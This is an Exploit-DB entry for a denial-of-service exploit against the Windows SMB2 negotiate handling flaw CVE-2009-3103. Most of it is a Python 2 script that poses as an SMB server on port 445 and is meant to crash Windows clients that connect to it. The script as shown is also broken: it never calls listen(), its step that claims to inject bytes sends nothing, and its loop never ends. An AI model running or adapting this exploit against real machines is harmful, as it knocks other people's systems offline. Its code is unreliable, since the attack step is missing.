Windows SMB2 Negotiate Protocol 0x72 Response DoS

ID EDB-ID:12524
Type exploitdb
Reporter Jelmer de Hen
Modified 2010-05-07T00:00:00


Windows SMB2 Negotiate Protocol (0x72) Response DOS. CVE-2009-3103. Dos exploit for windows platform


# === EDIT – this exploit appears to be exactly the same one of one which was already found
# and fixed notified by Laurent GaffiĂŠ, i did not know this but his blog post can be found here:

import socket,sys,time

print "Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600"
print "Written by Jelmer de Hen"
print "Published at"
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smbconn, addr = smb.accept()
print "[+] "+str(addr)+" is trying to make connection to us over port 445"
while 1:
	new_packet = smbconn.recv(1024)
	print "[+] Waiting for a negotiate request packet"
	if new_packet[8]=="r":
		print "[+] Received the negotiate request packet injecting the 4 bytes now..."
print "[+] Closing connection... This is part of the exploit"
print "[+] Done, if all went good then the box on the other side crashed"